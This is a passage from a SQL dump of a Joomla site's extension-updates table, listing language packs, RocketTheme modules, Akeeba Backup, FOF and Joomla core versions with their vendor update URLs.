NZ','','pkg_en-NZ','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(15447,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(15448,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(15449,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(15450,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(15451,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(15452,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(15453,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(15454,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(15455,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(15456,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(15457,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(15458,57,0,'French','','pkg_fr-FR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(15459,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(15460,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(15461,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(15462,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(15463,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(15464,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(15465,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(15466,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(15467,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(15468,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(15469,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(15470,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(15471,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(15472,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(15473,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(15474,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(15475,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(15476,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(15477,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(15478,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(15479,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(15480,57,0,'English US','','pkg_en-US','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(15481,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(15482,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(15483,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(15484,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.18.6','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(15485,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(15486,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(15487,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(15488,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(15489,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(15490,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(15491,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(15492,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(15493,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(15494,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(15495,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(15496,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(15497,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(15498,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(15499,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(15500,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(15501,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(15502,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(15503,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(15504,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(15505,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-3.html\n				',''),(15506,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.11','','http://cdn.akeebabackup.com/updates/fef.xml','\n					https://www.akeebabackup.com/download/fef/1-0-11.html\n				',''),(15507,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.2FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(15508,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.4','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n					https://www.akeebabackup.com/download/fof3/3-5-4.html\n				',''),(15509,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15510,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15511,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15512,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15513,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-3.html\n				',''),(15514,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15515,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15516,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15517,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15518,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-3.html\n				',''),(15519,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15520,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15521,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15522,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15523,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-3.html\n				',''),(15524,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15525,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15526,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15527,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15528,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-3.html\n				',''),(15529,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15530,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15531,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15532,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15533,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-3.html\n				',''),(15534,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15535,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15536,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15537,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(15538,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(15539,3,0,'French','','pkg_fr-FR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(15540,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(15541,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(15542,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(15543,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(15544,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(15545,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(15546,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(15547,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(15548,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(15549,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(15550,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(15551,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(15552,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(15553,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(15554,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(15555,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(15556,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(15557,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(15558,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(15559,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(15560,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(15561,3,0,'English US','','pkg_en-US','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(15562,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(15563,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(15564,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(15565,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.18.8','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(15566,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(15567,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(15568,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(15569,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(15570,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(15571,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(15572,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(15573,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(15574,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(15575,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(15576,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(15577,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(15578,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(15579,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(15580,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(15581,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(15582,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(15583,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(15584,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(15585,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(15586,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15587,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(15588,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(15589,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(15590,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(15591,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(15592,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(15593,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(15594,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(15595,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(15596,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(15597,57,0,'French','','pkg_fr-FR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(15598,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(15599,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(15600,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(15601,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(15602,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(15603,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(15604,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(15605,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(15606,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(15607,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(15608,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(15609,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(15610,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(15611,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(15612,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(15613,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(15614,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(15615,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(15616,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(15617,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(15618,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(15619,57,0,'English US','','pkg_en-US','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(15620,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(15621,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(15622,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(15623,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.18.8','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(15624,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(15625,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(15626,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(15627,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(15628,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(15629,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(15630,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(15631,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(15632,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(15633,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(15634,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(15635,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(15636,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(15637,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(15638,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(15639,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(15640,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(15641,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(15642,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(15643,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(15644,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-3.html\n				',''),(15645,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.11','','http://cdn.akeebabackup.com/updates/fef.xml','\n					https://www.akeebabackup.com/download/fef/1-0-11.html\n				',''),(15646,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.2FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(15647,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.4','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n					https://www.akeebabackup.com/download/fof3/3-5-4.html\n				',''),(15649,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-3.html\n				',''),(15650,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15651,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15652,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15653,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15654,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15655,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-3.html\n				